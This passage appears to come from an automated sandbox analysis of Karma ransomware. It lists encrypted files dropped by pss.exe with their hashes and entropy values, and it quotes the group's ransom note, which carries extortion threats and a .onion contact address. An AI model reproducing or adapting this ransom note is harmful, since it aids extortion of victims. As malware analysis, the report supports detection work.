.7h...B&^}Q.9g...2.sU(Y....tV.....J....W...*.7....are..,.
C:\Users\user\Desktop\NYMMPCEIMA\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Desktop\PIVFAGEAAV.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8058274128306415
Encrypted:false
SSDEEP:24:gy1qVYxcJ4xYwQ3wvWRqM45pfGSQVfR1ZWJYN/XBQW5Uu4KH8RaC:S/rRwA43fjQVfKYt7U1KWf
MD5:8C94F123593C1EFDFEB0E2D80A570B90
SHA1:9A98EE225652380F456FC8AA01FA4103E0FFFD62
SHA-256:876232C6DBE6200C91625D68990C04EA673349AD9AA437D7C8BC05D8C4F1C7AF
SHA-512:54F68FF974542104CDED40B11A2187AB976A31EF031B92DF6B0DAF6B8BB0BF0E34D8BE5453248323CD0D5BF174803CC260909D67F3CF69A67380A5B44335C923
Malicious:false
Preview: ..N........}u%..wSt.C......l...(..p...r.....9...#.....KARMA+.....q.<..xJ0....|.....~...|.....(...L./.MY).......v.........'...y..+...R*G.._.*i.E.P|...t>...]...#.......*......=.dM7h.C..zIV.".h./%..".Q.H..-&ji... ..........a.D....]..x......Z....r8....M+..t..y.K...Z..Z~Z...2..feS>...nse...B.<..W..d.)......j.%.....t.].0..R...Ip]..:..Ki4.....'....qF.K............ <..nTT'..mB..+...gr..yKy.FA..B.`..C....i......pE..VL.........Z....|.......F.8.T...8.Q#......d...'..e<.0l..,|kd.n.F..%..5...V........D..t...M1....\.LL..MO'.m...."XWe......v..n.....9.......e...^WW.;..qGQ...>.qh..[..hu...?..\....;.+.../.-/..N_....A...P.B.rR.H..8..=S.~.TG....m+._.6z.o.... &.`>0.5E.+6......O.....Q..S.(J.UZ..z@...M........g;.....ys...9..t.2........<;j..De/...0X..=..[;V`&I.]......-..<~1..T..........K5Aq ........T.54......f.3.5oo......d.".X3YmW.@%.(Y.....$..-.o...S.>@@..Y..0.h.6U..[.*3..h.......Kn~..9.&.e."...1.`C6.).l.6w.eF9..Ao (..&.\C.%.f...4......~:.N7.&.j.
C:\Users\user\Desktop\PIVFAGEAAV.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814709505401737
Encrypted:false
SSDEEP:24:pjxRzR/cl8GJDSEip0k62HDItLV7hxDBMCoul27:ptzGJPi2ktItN/DBMB
MD5:B00B584A51FCA2251D7F1C7958B054EF
SHA1:868EECB137351B8F7BFF8307A4757636DEAEF53F
SHA-256:02636A1FBFE2D7DCB4FF45F38DF2F9BBBEDBC6B00261681AA652A31E7A37DE66
SHA-512:AF523544F9297E8A051D3C1216CCC944DA915A8D450076839223272063EE30C279A265F6FE22886B22D0DB8A3130D30363E75ECDA9B5AB74313BD404E59710F8
Malicious:false
Preview: .......c...`...Vdc.....L..LU......?U>(..<L.~...$.H].o....q<...KARMA....L.... ....R.{.{E+..4.x...Z.#.....K9.".c.._{.l...e..b-..O.Y.X..WY3.7..%.\jN...I";.r....=....[..-.g/,...O...W..L...m....>.|..$Q..G......Pt:y..b...G>R...Q.{o.Bw..#.U..............N...4+LE..PN......O..#...._g.'.,k..e..[.C;...{)-.0..;...}....|.%.par?q.F..nr..9+.d.R@.V.K..tr..*..K"V.K].q.BSn.l.....2.."$.....Xa{..a3z/g.........-.C.....P.o-.vP2.9..O7e\..D9...C...YS....5:.[..T..~..PK.7....m..+.o.C!>`....wU.e...)[.b.-.U....;.F..H.L../\.=......ib..#.N.r..#*Z..........g....:f.."..D...*....a....!....L...G9O....w..k. n......".l..g......&.o5^..&.3.~Q.....%.H.Gn.-a.j...M...... .Z.\!.{.~t.@..V.k-P....$ .^m...|.Lk.X.....z......f.i._r..u.v.TM/h.'..>.w.&..|.CO.}rK..}..C..<....{.t?8.......P}.;^.B.P.S....Wk~c..!w|...j.....Bc7...O....-h|...*RUG1.....r...h.8{...{p5..%8.....I..v<.v...u.....8..=9.......n..O2$;....u..v.G.mc......P.'R....;L4....7p....<...CK/!........P...D. Se..b..i...b.FJ.6.J.+...
C:\Users\user\Desktop\PWCCAWLGRE.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813496593107111
Encrypted:false
SSDEEP:24:KkeZeEHreiz/vxc3/utxsu/SKRzpQD/6YqpIK0mb9uDZh4880xm:he7SavmPwtqUGeYYIpmxAv4t0E
MD5:A205E562AC6B5C8B484AB016FCDA48EB
SHA1:902F5E3A73E26B1EE1D4758201276590EDADAB6E
SHA-256:42AA8EF0CF941B62D91C2447EB5EBCD8013E2EE4E5B5B892B384048F095A27C8
SHA-512:881554A6E9DB24FC8550E03AC51B4BC0D7A84D822ACAB4898DC579662E756345B48B488D9DAF743BD53949125CC9C77B55E5CFFB0FF97E7AD2367EE5FFF7610C
Malicious:false
Preview: .6..c.7....c.?DF$S.@..K.4....G...{&x..<...R.....7...^."......KARMA;.Y.|[....*.._n.n....(..gQD..'.S...1.-UEYC.[hC..-.r.....$....|....u....8?...c..QjBY...v..R..C...N.+..\.-.....+R.....{.-.^....#.}...|........3..'...Z.FEJ.....!....w,..Z.G....kM....4..u..Z......Fd..A8.aL....,........o..R..)F..X..Y..&&k.Za}C.L..y....~o.A.U...7Uz7.....y...............#..F.4..CL."..e>.n.....).es[...x&\^....9bN........?...{..}R...+=;e.&...b..YT3....U............nJ..;O]$"...=..l...2.Z/......82......a..K.sZ#... 0.2... .8s./..v...|..._.:q&.]...d5AP...:..@.%^D8TQ...Q].+.bDa..%..yL.w.....!&..Q... 4.0A.-.....ZF..O......@..K.....Q....r+...u.P."..rO.x..Z.\....3..$yF...l.V..4..?..4O...h..a.!R{..G.F$.........BU.\I..k$b......{....p..5..a7....c7.@.....g..A....._..es{G.24....b.._KM....5......9...w...h. ..s..y..A.z...5.N......2da..K,...B.!..........tE.,. "5..N.VW..&R.....?Y.]=w.(.g.e.../=t.lO.#.9.TVs.0..E...f..f..x.%..W...........M..../.C'..]..%.....`.;.H3...i..K..r...E.
C:\Users\user\Desktop\PWCCAWLGRE.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8171099113409985
Encrypted:false
SSDEEP:24:5d4VGtLCaz2/NCa4kCFKW+ApqZki6M6N9BOg2SIjJbjrF2q03MHsJqX:lth2/NCOCvpuEMunxbmJ3rFNMYX
MD5:0794AA12560655EA0D1A26CF29B24E01
SHA1:485976A464B7362A6F19E9BDAED0BE2F79A53F20
SHA-256:07C5859268AEA636072CFB40517E3AFA9D56D6135EA6FD2A04AD84FAD72D2045
SHA-512:71C3EFA86A0E2959F2E2746056DC330EB7D8C2EE9FA959D2E6766274E5BC99A231B38FB0F9FD618B5CE3A044E50F4835369320127EF6473268D5A8CAB9FD3072
Malicious:false
Preview: ..q.7..."....7.oGY........u......gD..R....`.8..'.....H...2...KARMA.)..xj..*{..Q...V.Ky.V.`...iH.\?.]..P."Uc...,y....!.'......B..x.6.....<e,..w..ea%.z..Wy..b.].5..39<Yd..{.*...a..H|tx6~8..bv.FC6.}.TH.kO6&....0.h.....;.9..=.25...B~H.....l.V..d.z........<](.z..x.Q.....7..QM../.Y.......$.I.._.x.0.nu......J...j../<h....'.U.....Hw.+K..6T..J*EW.Z.:..;.....$....../..Q..h.....9..p.M.y.A..3....&.Q...V.....W..1.i.......!&}..i.EOp..bX..M.(..L5..m@<..aA.!y..4Z...........,.`.........#!F....s.@.m.=6.2...%....1g.....lJph..O.y..Q..v......FV2..m:.y..z.r>f..T)4Y`M5eK1.6m...y..5..5..?,1.....o&g>.H....${V.b.....E..:..2..C.1K|FO...>.m.-............&Q..-.. .f.o..F.b.92..Q2..:3.........@...d..A...#"..JK}.#I...rK....Z2b.\.......7.....r..M. h.f...F.`...8..9.uRw..:.a.]/.3OX.G....X.Mflh.lu..~....0.R[...M...h.7..R...pWt..Y...D......./.....1.].....T.F..oH...G...hg1.a}q..N./.._..Bf..k.}-...I.....g...........~...........+E.^.@p....?.W.....R.eu..k/.._....p.h.)d...+...Z....d
C:\Users\user\Desktop\PWCCAWLGRE.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.812082298645967
Encrypted:false
SSDEEP:24:zHlAn+u02GZDxIk4G93zbVUHsODK6ZW/Nm+u:zlA+uT6D6k4mj6HZZW/0d
MD5:E7FC888E4C02A9C87CA616628478458C
SHA1:ABB92988C0027BCAB61A3F450AB23DD97F1BC305
SHA-256:A11A9A59F8E7B026407604E10C6CD045B4C83272310604067E5659CAAE3E33B8
SHA-512:6C29D80EF0EFBBD82872A2251741CFCB0247D75D6210B162C7F68FBAA0E215E9D6632B0A61B3025DA044834C527310D844CA2D62DBEE8D6185719D4C7D3CB72C
Malicious:false
Preview: .sg.;z......._<~.s...y.~?.........Aq:6.,..5Yq..!*....H.7..5...KARMA......G..t.D.e(~(......XY.u;...tR.....x.l..C. G$%6R&..t..,.v...*.eb.....k....A...e....R'b~...h.1STxsM:~x-/..-z...<...b..3`j>......C...9a-..k.].~j.._m\...).,.4.G<.....k.!,...M4`.89.N...<.!.5.L.~.ty?.d......N.....t.I.j.>..."a[.~..ARk<.S....O~.p...'u.B.cI`.G....a.k..s..(.<...t.gn.L.3.F......m.gJ..qU5...;B.P.&&..F.G]d..sI(.2..............%.5.e..P...1..K1.B.2+V..E.....y.w>A.c....(.......1E.~.3..z./.r.....nK......S...8UB.F...gzp......|4.lIR=]5.8..~.R......!~j.1........^..4W.?.+....K.D9.wg.....2t....v.L...4@....S..5....y.R.....W...W..$a.|oiw....<.Z.vW.....A..j.g.dC...V\a.C...v..7~,0.L.....#nJ)...3..C..C.....>..sGe..b..4,.a.3.^...X>p......]...`).."s.@....2.B.R.....h).*i&g.V.....4..2...q............3.YJq..'........3..+ +.7.....D....mOY..w.E..{../.pP..\...)1D.`.{.;.oke.nE.O..Z.%...q.......~..7.&..-!.1.((e....E..X...T....<........o..G...]...:....'...,.....D.....m.vS..+.@..L...fS.G.....s
C:\Users\user\Desktop\PWCCAWLGRE\BJZFPPWAPT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814750325268285
Encrypted:false
SSDEEP:24:bEuOEjn5aUa7SpwFRC+VYtMR2XXC8QOBmbCvTMynVypXvt1VuLCfp:g3Et/kq+x8j+YTXVyp1R
MD5:9B6B985952E08B8F0B5743114B52E876
SHA1:124A9174AAB93FBCC846011CA90EEEC2A4EF23D9
SHA-256:4705E3B5138E3C946EB24D3AE4F096C229CCF38955B9D8D88CCEF5D0419950F7
SHA-512:1D3360758E5C672F9FC08A1A1002E5678CE04D3EC7F2E83390137AA02FC6D45740473EEFAEDA9FAA6A854FAB74B3DAE09152B6F233B904EAE1BED5ABD5B587B5
Malicious:false
Preview: QI.K....q....i..qI>.r......5....<...o..v.^..)#...f.Zx\.%.....KARMA.Y..6sh.q..(...l..Q.8..Z-Q.mY.+.S..Q..j.h:.....0.......|.r:.A.Pp=.a...}..J..#Bk6V...H..B.<.D8.HT..)/L....."r..5f....-o.D...F...o.B(...Y...8..9..a...4.?.....`.a.".?..l.~.).....@.`T..f.qb.XD...:..Co....O{....B?.....'.ck._...S......._./.v..._...f..._.8...5wx\...w..>...t..6....|.L`.[.b.&.K..vq&.X.Z..n.U-..f......I..R.:.....h.....H.W5.V.T[G.x...!5.F....i'.......O...:.f.;bp.y.0.;..H)9.p..C..V.OBL.}.x...'%....$KT.([.....Dx.p.f-{...Y..{!])..A*5...aRf....N..h.#t.?...P....s.K.T.;.cx...}\.....<.M.s).*.7.E....m...Z..//8...~......l.v...R.8X.R......7....`.......5.~yo..A..A#.U...H2..~..o.N..j0.*<R....%.D..smY..I..AEe^d.j.l...z...Ic.`...p..m..}.A..0....m.g...&..O.%..9...P.j..HA......E#...*.....$..Tx<.:.b#..t..{...d....W.%&.O.....f...\.<.S..dF.].{v]..j2._.C.....J,x..n....&..B..|.._3>.:Z....I0^.=<....P...3+..2..9..6Q..6......l;2..n.......z-...+..j.....c.N..%Q.ek=\......_...rd...7zD:
C:\Users\user\Desktop\PWCCAWLGRE\BNAGMGSPLO.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.817306123264909
Encrypted:false
SSDEEP:24:ibdDsaS8XRKaGYuCqDdgGOQtL2CDQAbwvrqQ8PanZQi:0dDsaS8vGYuCMqQB2KQAdQ8oZN
MD5:13E280C28A34F5B5497905B4FB375793
SHA1:1CCCB7DC8B06C6C6B1FEB5541B9D8060A7D361E7
SHA-256:57DFA63D1974B1AE2A52623B716004CC2BBE200BA126354944F27B41583E02E8
SHA-512:ED80FBF58642E0CE1D471B0C9E46C7759E11252F53C54F6AB4F1926D3A4B6445008846E6D93CE6922C9F12F8B9DE313D15F90D9E612D8DFA67E8C192FC9AB379
Malicious:false
Preview: gkF...S..;.?...AN.qFi8..o.......U.&..4.O#h..,:.|.z..D.vw~...KARMAz.5.......L)..u.6#.....S7IlW..f%....[.G...n..\8...'!.[.86P..\.6.e..6[...?..^<.....x..bO......@GVx`.f.x...].2...^b.#..8.q.C.'..2.d~.wu...}.x.....R..7.-.......&.3......XWd(..H..h-..5...+...jn.@..A.:v....<E.."..cP.1..J..i. ....?.Q\_;.V.%.:....x.p6.q.L.....\...R.. ...:...$.....7..x.(.f..;..dk..<&.....=emeJ.c...a.4.e.......5..."........,gO.o.....{..3...?.w:...Jb?s..8.h.q..\.|.......F.....kl....fz.mS5....N->.tZ..H.j....K.....ax.x..x.)..>......,....3.Tc..u>aL>..5,&!..-...!......C..n.a.>...8KDe...M&.....e.J..XA.Dz...M..'.3..,./...D....K.U.j.hEH...zd...............G..'`..,..X...1+.._...(....E.B-..FK.La.j.......}.$.Mt.\0..<.&U-..%..]1.....>L..y...^&@..M......sU....1\u..S|..If./U.......>..0..!.{o....[p&"A/.1....N....E.}...b'~..=R+x7...P..8 .........+.7.._..S.e.&.?....;.....{I....M...........t....~..(1...T.....T..a.$.........S...&........;.yGw.u.;..K?.....s......X.z...n.#.W....W;..
C:\Users\user\Desktop\PWCCAWLGRE\EOWRVPQCCS.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832821038591339
Encrypted:false
SSDEEP:24:DXoR2+K0WEH7nEvzafJGI7KDGjVVIYOq1Wpnt6k9hB4CJKhYXlF:k53B7Ev2G7DGxlJPkbB4CJKKH
MD5:1973B01FB305EA4D713B78494611E6E4
SHA1:0973C43CE62C784456C3AF6D76F7BBE7DC0783A9
SHA-256:8BAA63935DEE483E1A2F866D40E14B264558AAF01F1EAEE329C47ED391BC6BF7
SHA-512:D6D655D524D4401799CA5EF3A268B4B37272B12FDC22D9FB9C8AE45075F6E803640484F19D5F0F03F789D71810328FC7345C891E549AE275FCFC0F86688EF9F6
Malicious:false
Preview: ....v.P..3@.D$'sQA.....tqJG...2.......;Lj....?....IOi..._...KARMA.8...=h ./.t\..6V..y.;..6..WHe....S......)........goO..z.k...hJ%T.3..cY..]....$...............<mH6...T..........*...bS.Nl...t".&l..(.wM^....Y.y/.8.XL..a...n.#.!.`.y..=..`...#......KiI...'$._.~.d.D..\}buZ.\..1hHh.+....Z=.3.N....1$..W.k.Y....Uq..i.`....U..rhn...#..UN.ghc..t.$Gl.gw.PD%.O...^WIj.XS..W....:......+B...\..2.`....*.../....u@I_P.....|.:U......L..E>WY..lPd,.7Yb.[.....a...%f=........k...+.........a.M9.7I..c...~.......`~r7.1t.Y(:5-..\..V?......|.Wu"........s.....B..........6V..k....9..4..Y.8^...9.RZ..v.o....3]....D~.bJ!T..858i..?..k.._.6.h..Y...b)a.^.b..r..!.,z....d+.q.qp$.nT.....?%8......../{.t1.s3N....@...i*..b..Z.!zb.....i.O....p..p.)...;.4H+..R...0U.jQ...Q.H.N~2.....A....}l.)7&../&`..pO.b.$..@/..W.......K.pO..L.l.m.&...=i....m.h...t;...=.5..c..F.I.......')...&?....xO..?..VL.J..E._B=."].U..F.v'...p%.....,g.k.MYJR..b..... 0..!.3......./@...{.frZ.t.u.,..(....+].
C:\Users\user\Desktop\PWCCAWLGRE\EWZCVGNOWT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822508114103896
Encrypted:false
SSDEEP:24:EpdJ6rZ/1S629p1MDGuul2lvhTpoUE6M0CkY7ykcD:Epz6rqdz1M82lvhTpUkY7u
MD5:6C760643E8596CC1A14C377C6BCDB385
SHA1:6D736740E73199DD2EA270F7FD4B3B991F9B2017
SHA-256:D1A707297AC0953110B9E23DECDA8370478CE5997F188FF5232BA3797F937DAD
SHA-512:3B80A474B388DB9FAB8AF1ECD289FBAD2082A1FE83A22806C6D43A608B5870DC70ED6C2BF6DA664435E6F5D9EEA6587A94515008BA283FB16925A200AE918DC7
Malicious:false
Preview: Lp.H.py.l..&5........P{t........ ...$.A.m.fou...y?.bB.DUp...KARMA`\@...+....._..T..O....m.I..N*.......t<z..L......J.../T.......'l..I..b.g_...J.gb..".n_m.@x....#Q.......`.....P....RW..*1}....i1...m..#p'%O.....X'...8;....N.[......kg.7.6...#..Q@...1..P......W...oO.~.9..`..S..j.rO.=..E/."......}.N...W.T..D......K2"...kl\....{.vg...8Dr7uhw....|...7)......!]...?.C[..).R...d....X.J....z.`.HwL&.)..a........'eE.3`...\>....r].|o..Hai......A.....a0.5...<.g...Q.8%.C.v....[hx.]?.;.....{.\..{g.........d.&.......x.%LU.J.p....Lx..#.......)+.X.x.0z....c....4=..[r.q_-.iY...).,b\.4........`85.\.x.0.............g.eR<..FG.(I... S.50.]".. ..[.'4 ...p.v.....,L..R.k.+E.B.....D..b.J.o........WT.F../.......(.g.I.. [...S..\..^F&...+.t ..u......~..b.......9^.Z.8.H ...O.6...z....4.......S..p?w..P}}4..UR.;^..$w^do.$..%...sbQ.Q......#...^ .r+*..qD...R.....m...4..-.........,5a...9....p\..iB...I..<-. q.j.:1.SP.9K....%rY....)..|...S|.........v?=.....l......yo
C:\Users\user\Desktop\PWCCAWLGRE\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Desktop\PWCCAWLGRE\NVWZAPQSQL.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828951016468186
Encrypted:false
SSDEEP:24:HNMS+nk3DhKfGGFWNYgo38vQz6BO57l3qtnwX9jAv:HNt+nklKeGFbgRQz9Bl3+69U
MD5:C7A4A386326626AC49A1AF5F8F333D2A
SHA1:BC11135C3D8384F8B1C8E7EF1F66DA4A86599B4F
SHA-256:49801119F049BB2D2B3371D4ED0C72A858B2DDB3FCC29AB7F25CC06A06C835B2
SHA-512:E20CCB7FCF89FEC1166B46B6CD2D0CEF68DC5AA599AD293AE12E0485A8131CD8B4B2FDDFE19EEC2F79ABFC070DED9E5783814D660DC5F53FA275B599897821F6
Malicious:false
Preview: ..7bF.@x9E1d0.........B..]......==..0BEUX...K.T.[....4:6..8]...KARMAY..."o.u..:z....9.@..h...9.`OzY............=3..5.`.......qI.:...5.....f6.......^........f'@S..W|.0..}..T/.........l\.....L%....Z.....X.Vb....w..S..........{..!..ta......*.....u....$....7.&hS.V....M.0.n.W`n.. i.q<..............U/zz.[..!....X.=E_Q.PV9.5.......<rn....V.&u>.e...SDF.X......V..o........T..y.[C..@>.._6........h.../.M..lU..*...\z.|o.....f..m1C..|.."...Ke.b....O....o..)o=H....>..P.~.aZ.@i..w.W.G.m...0.....x..G-1@9.......$..l.._.W.w.7..t/...0....+.....KCR}t..e0.% .....rQE.. MQ...K.i].P..A.`.m.. .....{.34..3...t.g_..\.L,....C.|..o....?..h..L...........s..]./@....dD.j.Q.dm........G..C.[.o]BQ.m.;.....]..A#]D...#...1c..}V.%F ...~.T.`w.%.....O....5.2...T1%}.....*...7Yot*...J...4..#...H.].q...}.%........kWa..2.....<..]..K..s.P..Jt...>z..?YEr....Y.x..9......[....Z.......@r...j.j.&..g....t~P.. ,..E.;..$H.N.....#..JF=...v..Fpe|P......D.;..........l..4..H'...`......NO.D..K..#....f@.c
C:\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.849687165675415
Encrypted:false
SSDEEP:24:mPzQDmzFo5xv0tpF7yYOwp+6r0AljYmv9HYjRvcV:mrOm2ctp5ywvvj/HKRe
MD5:A4B04415DC253B5089E71C7576D8DFB8
SHA1:7116627769B1AD762E28F67ABEA00E33F4FD5372
SHA-256:90D6423644A86B1448EB2AFCDBA4F534A948367723AE41018ECDE2F4BD81B761
SHA-512:AE1A62FDB1497A566A5F4E7E1EAFC6C7B1E5D0433471C982874D33AAFFFB245D88CDCC7744117A5726D5753074D7F4AE36650391EB700D16E6A8780BC45F7369
Malicious:false
Preview: .Pn.J...T#.)..[.W...s.\.x./.....;.|.\b.Dw.N ..iy.J.P.....H....KARMA....4.."v..9.rc..F..a!6.Ld#J.!>.Y,4..7.....Tf.mN..6.92..Z=d...GSP..5..~Q.m...V.u...kH..(...+*. FYC.$Z@..<^ze ...C...;......K .iY...#..C....9.....h)&........Y......^C.0....2..>.V......b....q.x..\,...`.5.asJ7X3..?.........ci.[.8{.....?....$....j:..Q.h.a.$.x.0..uR..MhY...?...f....*.4..W.:..FZx..%.,..kK.D.....y..@E...i.;.Ba..ts".)..f&.8..n..W..8@b.}......./..#a....%->....xH../`q.k......9W0.g......A.`....]+.4._5..TU.:c%..............$Go..d.:.......h.hO........<P.JI...o."..%.....J/y...c.M.X.-.....H....7)..O...<s...L...F.... .b.... Eg..XD.X.9..._YQ..<W....r.$....!8....].,=...z..S..z{^?+Fh=.K....v.9yE...(....d...9...s.....2p..).c.V`..*g....D.(.b.w=...j.b~w...>@Dp..V...E.R....F......t..[....IH..'XQ_......l..@.(*......nUc"$....\VUlo..F.."..U.U..$.*i......H...;...h....tt...Cc..n.\.....i:...qm.`.pF......k3C.A.j_.o.(\S.pb1-....n.A=[...o...KW.8.= B...<.=.Z..v....4){..........3....9.+
C:\Users\user\Desktop\QCFWYSKMHA.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.811695096551344
Encrypted:false
SSDEEP:24:dx/SJrU/gRUdOgjKyBYegROpYZocXwGMs/NnRRQSGbslgBMS2:vSW5ADyB4ocMe2SGb0QMS2
MD5:D4FFCE4D6877BAEBBB522E5CADED02CA
SHA1:3B5315C966D5048A351A2A08F1FE4807A5B586AF
SHA-256:BF8038905211A7F931D5E91EF4B78FCB45C2C36669ADD68A3D16A93246781025
SHA-512:CB338C8AFF5C2C897AE36A88FCE15F78D88E6FDBE5A912186E5B03ADDC52D11BE3AA4219C4FF36BEA608FB316500A88730D1CC08626996B4AD2576788D5FBD7E
Malicious:false
Preview: .V0g..z.4..;.$-X.4tk...5C.R.......d......U.*.g5..9z....d.<0...KARMA..T.hn/......"$.=1?R.0.U.......B.....LR......Q7.......FB..@t.W..)...e.......|....*c..o...-'HL.T...AZ...p...!,...Fpd....DL..;.V..J..f........x..t.h$..a..61&>>.......&...~:..8..`..r{.v.*n.+./o..V....jCZ.....OJ./.#&..u.CT..N...1......M~dt.sJ....Ia........Q?(.^.+#'%....B*E(...^.+.S$d../.Qc..<.J..[#.......1....=...bH....o............D.u.:..7!...L.7G.oz.Vw.+..%N.....ppe*C%.x.%......U'_El`.e...6...C....f4$.v.&...5{.=...h.y.....w...]v..K2....Y<2.?.-..mU.Po..j(..ar........N...U..u.Y....]...q..$..5.......w)x<.a.l0%.nT.M.^.]u..j.z.aJ.7..I.16g@.P1...6p4.-x.b.i..TR.,.5.>.C...D.c...c.EG.."p.Y.5.x9NH/..U.B.y......P...&..2...N*......mt..)r.o.x.E....P.k.k.zs..M.."......X.'....O7..)8]..S.fJH...}...b...R.o..w..PhrR3..I$b.=....,I..ou..[.s..........o..v<...R./L....tbU(.....*:..f+......_-.j.^...F.e..k.R=$..@...z.tg.;.{......R.PW.V*]J.C....]..Y(@..<....XV..e.y....I.P....V.u......._..v......
C:\Users\user\Desktop\QCFWYSKMHA\BJZFPPWAPT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822506072907368
Encrypted:false
SSDEEP:24:AoPhATkn6lQSIA5SJogvs/Tzz44LRm1VAwgbw8wgiKroh7BiyXKBrWM:AopJSI1J7qTzzTILixVrc7BiyX2
MD5:09B9E1074BAED7E85E9DD2379EF2DDF9
SHA1:553E23A92BA02AF432BB6F722D815FDB0BD845DB
SHA-256:9FD067B5A7DD6031E90D0EF9E671960FA6DDBB0B4E83F359EB69ADE4063E32AF
SHA-512:E5DADCCB67B5D329A439CB22D5D6F140D654A3F03FEE06AB86CC05F3DEEC69AC8CEE7CD210ED7C45E7791923A8E18105F2C666B8C55C11F6D173CE53B6E3D22C
Malicious:false
Preview: .>^d......).&.g_.6.]...p..Bs|...cDM.l.IE.`...{j..^D<...@.9......KARMA...._.%1...>ihaCG....Dp.#..4.K.g..=PjK<~.U`l...d.E,.Z+.q l..Bj..;b.$.`..Uf0..G...Q.........d...ec.4\....;..*.'.4.3...'xEH.f#..LcA..d..$...[6.63..Vb..3.c.4z...7$.8~...R<6O..%Q.Q@...4....J..F...A&yL.c.....8..l.".o...]...?.s........0T.S.<....H^H~..R.;r.??........>rR.................7...4..I{.8........el...^.q.'.O)w.]..#.C|......OL..^..n...u..T.. ..D.k.&...U..|........c...gI.@...a....U...X.f!XPp(n.B.!.h ....8.Q..Mf....HbW.T.+...R./"..O.DQ.^.Y.t....I@...H.6........M.p..G.Z..=...<.u...T...-.l.u...){..#]7..t..%..L..a.J..c...$..=.$h-.>.[..d...'`v..<q..u^....`<D.E=.VG=..9....]v"...dm^.}.8..Z|...."~1<N.Z{......_...W.%.}T...K@......#./.r2..C..ns..?.!5._w.0...Y..p...............E.&..j.u.].|,.`.......\.?v.kt.*2......i...w.....Y.....B.D.......}..&..8L.-.:BQ..V....Mact...h..cnF..5.p^....#hf..../".....NhB....C..9.y..@.o[Y.+..0...R...Y...6.n.."\.B[..*`...GVJ.j|...<....M._.../...S..?(.....
C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.809728846675135
Encrypted:false
SSDEEP:24:uos26K2NeHJgp3CVLN11m2Ar3oFt6WMm9toL7zuD2:11w8pgpyVL9AD1s9toa6
